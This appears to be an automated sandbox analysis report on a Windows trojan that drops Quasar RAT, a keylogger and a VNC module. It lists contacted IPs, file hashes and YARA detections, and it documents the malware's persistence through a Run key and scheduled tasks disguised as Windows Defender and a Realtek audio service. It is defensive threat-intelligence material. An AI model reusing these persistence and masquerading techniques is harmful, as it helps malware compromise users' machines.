Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
208.95.112.1	ip-api.com	United States	53334	TUT-ASUS	false
5.8.88.191	unknown	Russian Federation	56541	KOMETA-ASRU	false
50.17.5.224	0x21.in	United States	14618	AMAZON-AESUS	false

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	492794
Start date:	29.09.2021
Start time:	01:34:58
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 14m 38s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	CVbJSUXraQ (renamed file extension from none to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	27
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@33/5@3/3
EGA Information:	Failed
HDC Information:	Successful, ratio: 40.2% (good quality ratio 33.8%) Quality average: 65.5% Quality standard deviation: 37.8%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI
Warnings:	Show All Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe Excluded IPs from analysis (whitelisted): 23.54.113.53, 184.24.20.248, 40.127.240.158, 20.50.102.62 Excluded domains from analysis (whitelisted): e11290.dspg.akamaiedge.net, e12564.dspb.akamaiedge.net, go.microsoft.com, store-images.s-microsoft.com, go.microsoft.com.edgekey.net, store-images.s-microsoft.com-c.edgekey.net, settings-win.data.microsoft.com, arc.trafficmanager.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, arc.msn.com, settingsfd-geo.trafficmanager.net Not all processes where analyzed, report is missing behavior information Report creation exceeded maximum time and may have missing behavior and disassembly information. Report creation exceeded maximum time and may have missing disassembly code information. Report size exceeded maximum capacity and may have missing behavior information. Report size exceeded maximum capacity and may have missing disassembly code. Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
01:36:08	Task Scheduler	Run new task: RtkAudioService64 path: C:\Users\user\btpanui\SystemPropertiesPerformance.exe
01:36:13	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run win defender run "C:\Users\user\AppData\Local\Temp\windef.exe"
01:36:14	Task Scheduler	Run new task: win defender run path: C:\Users\user\AppData\Local\Temp\windef.exe
01:36:14	API Interceptor	1x Sleep call for process: windef.exe modified
01:36:21	API Interceptor	549x Sleep call for process: winsock.exe modified
01:36:22	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run win defender run "C:\Users\user\AppData\Local\Temp\windef.exe"

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\windef.exe.log Download File
Process:	C:\Users\user\AppData\Local\Temp\windef.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1557
Entropy (8bit):	5.351891643737667
Encrypted:	false
SSDEEP:	48:MIHK5HKXE1qHiYHKhQnoNHmHKBfHKntHoxHhAHKzvQTH3:Pq5qXEwCYqhQnoNGqNqntIxHeqzcX
MD5:	E9163F5673A58133809F22228C6E27DD
SHA1:	236F6A2107AA2EA3092C50A94B72064FA435D4A9
SHA-256:	EA9B7A740D92C4113B89E33D9DBB0187CBBF36F2587AA5139421FDBC985EE53D
SHA-512:	F3124F6846C4730E04EE36698A88E966AEBBF6F7FCCD0C265A8BE183ADF6C641944B7FA35F0F320F65A36335697D55B44BD34B3494B228737FD63C80151229FF
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..2,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\34957343ad5d84daee97a1affda91665\System.Runtime.Serialization.ni.dll",0..2,"SMDiagnostics, Version=4.0.0.0, Culture=neutral, Publi

C:\Users\user\AppData\Local\Temp\vnc.exe Download File
Process:	C:\Users\user\btpanui\SystemPropertiesPerformance.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	6144:k6laOx87Xnl7xKK3iDgExiOP+MrRmD+PQXhEHlIxJKqM01FloHJh7GIA4hVvi:k6YmenBMKSUlm+4arHlgJNGIA4hVvi
MD5:	B8BA87EE4C3FC085A2FED0D839AADCE1
SHA1:	B3A2E3256406330E8B1779199BB2B9865122D766
SHA-256:	4E8A99CD33C9E5C747A3CE8F1A3E17824846F4A8F7CB0631AEBD0815DB2CE3A4
SHA-512:	7A775A12CD5BCD182D64BE0D31F800B456CA6D1B531189CEA9C72E1940871CFE92CCD005938F67BFA4784AE44C54B3A7EA29A5BB59766E98C78BF53B680F2AB2
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Local\Temp\vnc.exe, Author: Joe Security Rule: JoeSecurity_ramnitvncmodule, Description: Yara detected Ramnit VNC Module, Source: C:\Users\user\AppData\Local\Temp\vnc.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Virustotal, Detection: 84%, Browse Antivirus: ReversingLabs, Detection: 93%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......o`..+..,+..,+..,"y ,#..,+..,i..,...,(..,...,..,...,(..,._.-..,._.-"..,._.-*..,Rich+..,........................PE..L...U..\.................6.......... ........P....@.......................................@..................................T..x............................p..p...`S...............................................P...............................text....5.......6.................. ..`.rdata.......P.......:..............@..@.data...@....`.......D..............@....reloc..p....p.......R..............@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\windef.exe Download File
Process:	C:\Users\user\btpanui\SystemPropertiesPerformance.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	6144:8K2J10qdSlEc39HGx5yVmnKKJfotFCuHi/b25s/Wz0J:8KF6y0KKlotF3iKO/Wz0J
MD5:	B4A202E03D4135484D0E730173ABCC72
SHA1:	01B30014545EA526C15A60931D676F9392EA0C70
SHA-256:	7050608D53F80269DF951D00883ED79815C060CE7678A76B5C3F6A2A985BEEA9
SHA-512:	632A035A3B722EA29B02AAD1F0DA3DF5BDC38ABC7E6617223790955C6C0830F1070B528680416D5C63EA5E846074CDAD87F06C21C35A77B1CCC4EDC089D8B1FB
Malicious:	true
Yara Hits:	Rule: Vermin_Keylogger_Jan18_1, Description: Detects Vermin Keylogger, Source: C:\Users\user\AppData\Local\Temp\windef.exe, Author: Florian Roth Rule: xRAT_1, Description: Detects Patchwork malware, Source: C:\Users\user\AppData\Local\Temp\windef.exe, Author: Florian Roth Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: C:\Users\user\AppData\Local\Temp\windef.exe, Author: Florian Roth Rule: Quasar_RAT_2, Description: Detects Quasar RAT, Source: C:\Users\user\AppData\Local\Temp\windef.exe, Author: Florian Roth Rule: MAL_QuasarRAT_May19_1, Description: Detects QuasarRAT malware, Source: C:\Users\user\AppData\Local\Temp\windef.exe, Author: Florian Roth Rule: CN_disclosed_20180208_KeyLogger_1, Description: Detects malware from disclosed CN malware set, Source: C:\Users\user\AppData\Local\Temp\windef.exe, Author: Florian Roth Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: C:\Users\user\AppData\Local\Temp\windef.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Virustotal, Detection: 86%, Browse Antivirus: ReversingLabs, Detection: 93%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......\.................h............... ........@.. ....................................@.................................p...K.................................................................................... ............... ..H............text....g... ...h.................. ..`.rsrc................j..............@..@.reloc...............r..............@..B........................H.......(...H...............H.............................................{...."..}.........{...."..}.......n.(......(.......(....(......(.......(....(.......(....(.......0...........t......-...(.....o....o.......0..L..................(....-8......(....-$.....(....o.............o.....(....&.(....&..0...............o......0...................(....o............o.....t.....r...p..r...p..~....o........,...(.....t........,...o...../.s....z......&r...p.......,..(....&....

C:\Users\user\AppData\Roaming\SubDir\winsock.exe Download File
Process:	C:\Users\user\AppData\Local\Temp\windef.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	357376
Entropy (8bit):	6.424314821503838
Encrypted:	false
SSDEEP:	6144:8K2J10qdSlEc39HGx5yVmnKKJfotFCuHi/b25s/Wz0J:8KF6y0KKlotF3iKO/Wz0J
MD5:	B4A202E03D4135484D0E730173ABCC72
SHA1:	01B30014545EA526C15A60931D676F9392EA0C70
SHA-256:	7050608D53F80269DF951D00883ED79815C060CE7678A76B5C3F6A2A985BEEA9
SHA-512:	632A035A3B722EA29B02AAD1F0DA3DF5BDC38ABC7E6617223790955C6C0830F1070B528680416D5C63EA5E846074CDAD87F06C21C35A77B1CCC4EDC089D8B1FB
Malicious:	true
Yara Hits:	Rule: Vermin_Keylogger_Jan18_1, Description: Detects Vermin Keylogger, Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, Author: Florian Roth Rule: xRAT_1, Description: Detects Patchwork malware, Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, Author: Florian Roth Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, Author: Florian Roth Rule: Quasar_RAT_2, Description: Detects Quasar RAT, Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, Author: Florian Roth Rule: MAL_QuasarRAT_May19_1, Description: Detects QuasarRAT malware, Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, Author: Florian Roth Rule: CN_disclosed_20180208_KeyLogger_1, Description: Detects malware from disclosed CN malware set, Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, Author: Florian Roth Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 93%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......\.................h............... ........@.. ....................................@.................................p...K.................................................................................... ............... ..H............text....g... ...h.................. ..`.rsrc................j..............@..@.reloc...............r..............@..B........................H.......(...H...............H.............................................{...."..}.........{...."..}.......n.(......(.......(....(......(.......(....(.......(....(.......0...........t......-...(.....o....o.......0..L..................(....-8......(....-$.....(....o.............o.....(....&.(....&..0...............o......0...................(....o............o.....t.....r...p..r...p..~....o........,...(.....t........,...o...../.s....z......&r...p.......,..(....&....

C:\Users\user\btpanui\SystemPropertiesPerformance.exe Download File
Process:	C:\Users\user\Desktop\CVbJSUXraQ.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2111272
Entropy (8bit):	6.7152149759316115
Encrypted:	false
SSDEEP:	24576:su6J33O0c+JY5UZ+XC0kGso6FaI1IXgM6YmenKKSUlmDaGJTA4Pqa6jUvOkQwKYc:2u0c++OCvkGs9Fap5aLKLkDl+dUvO9YC
MD5:	9423821A023FB02427783F6385871B3B
SHA1:	1F75D4DC2E3665B6025DCEF7E0D9A51D96C608A4
SHA-256:	CEFA469207046F1BA256D52D6685B40376A06159926AB3D20925FB413B487098
SHA-512:	52D3791DDA128D28B1CF803E2A4B8F355B223587550A02A178F5D7FB339B196CABE847AB49EBE2E70CDFDEA41FBF62752E71E1920182BBCA7C5BA5B9F3CFF2BB
Malicious:	true
Yara Hits:	Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, Author: Florian Roth Rule: Quasar_RAT_2, Description: Detects Quasar RAT, Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, Author: Florian Roth Rule: MAL_QuasarRAT_May19_1, Description: Detects QuasarRAT malware, Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, Author: Florian Roth Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, Author: Joe Security Rule: JoeSecurity_ramnitvncmodule, Description: Yara detected Ramnit VNC Module, Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}.r}.r}.4,".p}.....s}../..A}../#..}../".G}.{.@.{}.{.P.W}.r}.R....)."}.....s}../..s}.r}T.s}.....s}.Richr}.................PE..L...d..\.........."..........N.......}............@........................... ...........@...@.......@.....................L...\|....p...............0 ...... ..q...+..............................pH..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc........p......................@..@.reloc...q... ..r..................@..B........................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.715211023726544
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.72% Win32 Executable (generic) a (10002005/4) 49.68% Windows ActiveX control (116523/4) 0.58% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	CVbJSUXraQ.exe
File size:	2111264
MD5:	b0b78da613422be0de8de2e2a2d0ce68
SHA1:	a1aea30e16b3bbf15baf1fbb78499adcc5e11d97
SHA256:	efacb905cbe59645ce57ea6ac46d32add5f48278aefd411bf4f53116ca0fb0e0
SHA512:	6448d7a633aceae8c20fd077e5d4a83f5a542f4b229f0299440bd1b9d90772c83e5a9ca831fed1cf34e75fe08ade8cd386d651d50d1dfee1e102df496252ea57
SSDEEP:	24576:su6J33O0c+JY5UZ+XC0kGso6FaI1IXgM6YmenKKSUlmDaGJTA4Pqa6jUvOkQwKYQ:2u0c++OCvkGs9Fap5aLKLkDl+dUvO9Yu
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.

File Icon


Icon Hash:	c4c4c4c8ccd4d0c4

Static PE Info

General
Entrypoint:	0x427dcd
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	TERMINAL_SERVER_AWARE, DYNAMIC_BASE
Time Stamp:	0x5C87B664 [Tue Mar 12 13:38:44 2019 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	afcdf79be1557326c854b6e20cb900a7

Entrypoint Preview

Instruction
call 00007F9848DC6C7Ah
jmp 00007F9848DB9A44h
int3
int3
int3
int3
int3
int3
int3
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007F9848DB9BCAh
cmp edi, eax
jc 00007F9848DB9F2Eh
bt dword ptr [004C31FCh], 01h
jnc 00007F9848DB9BC9h
rep movsb
jmp 00007F9848DB9EDCh
cmp ecx, 00000080h
jc 00007F9848DB9D94h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007F9848DB9BD0h
bt dword ptr [004BE324h], 01h
jc 00007F9848DBA0A0h
bt dword ptr [004C31FCh], 00000000h
jnc 00007F9848DB9D6Dh
test edi, 00000003h
jne 00007F9848DB9D7Eh
test esi, 00000003h
jne 00007F9848DB9D5Dh
bt edi, 02h
jnc 00007F9848DB9BCFh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007F9848DB9BD3h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007F9848DB9C25h
bt esi, 03h
jnc 00007F9848DB9C78h

Rich Headers

Programming Language:

[ASM] VS2013 UPD4 build 31101
[ C ] VS2013 build 21005
[ C ] VS2008 SP1 build 30729
[LNK] VS2013 UPD4 build 31101
[C++] VS2013 build 21005
[ASM] VS2013 build 21005
[RES] VS2013 build 21005
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xba44c	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc7000	0x13a7f8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x203000	0x0	.reloc
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x202000	0x711c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x92bc0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xa4870	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8f000	0x884	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x8dcc4	0x8de00	False	0.572867910242	data	6.67611805852	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x8f000	0x2e10e	0x2e200	False	0.335355267615	data	5.76010872795	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xbe000	0x8f74	0x5200	False	0.10175304878	data	1.1987458977	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0xc7000	0x13a7f8	0x13a800	False	0.481297042677	data	6.62212260461	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x202000	0x711c	0x7200	False	0.765076754386	data	6.77903165045	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0xc77b4	0x468	GLS_BINARY_LSB_FIRST	English	Great Britain
RT_ICON	0xc7c1c	0x128	GLS_BINARY_LSB_FIRST	English	Great Britain
RT_ICON	0xc7d44	0x668	data	English	Great Britain
RT_ICON	0xc83ac	0x2e8	dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 4294965391, next used block 7403512	English	Great Britain
RT_ICON	0xc8694	0x1e8	data	English	Great Britain
RT_ICON	0xc887c	0x128	GLS_BINARY_LSB_FIRST	English	Great Britain
RT_ICON	0xc89a4	0x35e0	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	Great Britain
RT_ICON	0xcbf84	0xea8	data	English	Great Britain
RT_ICON	0xcce2c	0x8a8	dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0	English	Great Britain
RT_ICON	0xcd6d4	0x6c8	data	English	Great Britain
RT_ICON	0xcdd9c	0x568	GLS_BINARY_LSB_FIRST	English	Great Britain
RT_ICON	0xce304	0x10828	dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0	English	Great Britain
RT_ICON	0xdeb2c	0x94a8	data	English	Great Britain
RT_ICON	0xe7fd4	0x67e8	data	English	Great Britain
RT_ICON	0xee7bc	0x5488	data	English	Great Britain
RT_ICON	0xf3c44	0x4228	dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 254, next used block 2130706432	English	Great Britain
RT_ICON	0xf7e6c	0x25a8	data	English	Great Britain
RT_ICON	0xfa414	0x10a8	data	English	Great Britain
RT_STRING	0xfb4bc	0x594	data	English	Great Britain
RT_STRING	0xfba50	0x68a	data	English	Great Britain
RT_STRING	0xfc0dc	0x490	data	English	Great Britain
RT_STRING	0xfc56c	0x5fc	data	English	Great Britain
RT_STRING	0xfcb68	0x65c	data	English	Great Britain
RT_STRING	0xfd1c4	0x466	data	English	Great Britain
RT_STRING	0xfd62c	0x158	data	English	Great Britain
RT_FONT	0xfd784	0x1c211	ASCII text, with very long lines, with no line terminators
RT_FONT	0x119998	0x1c211	ASCII text, with very long lines, with no line terminators
RT_RCDATA	0x135bac	0x65600	PE32 executable (GUI) Intel 80386, for MS Windows
RT_RCDATA	0x19b1ac	0x57400	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
RT_RCDATA	0x1f25ac	0xea26	data
RT_GROUP_ICON	0x200fd4	0x102	data	English	Great Britain
RT_GROUP_ICON	0x2010d8	0x14	data	English	Great Britain
RT_VERSION	0x2010ec	0x31c	data
RT_MANIFEST	0x201408	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain

Imports

DLL	Import
WSOCK32.dll	WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll	GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll	WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll	InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll	DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll	IsThemeActive
KERNEL32.dll	DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll	AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, 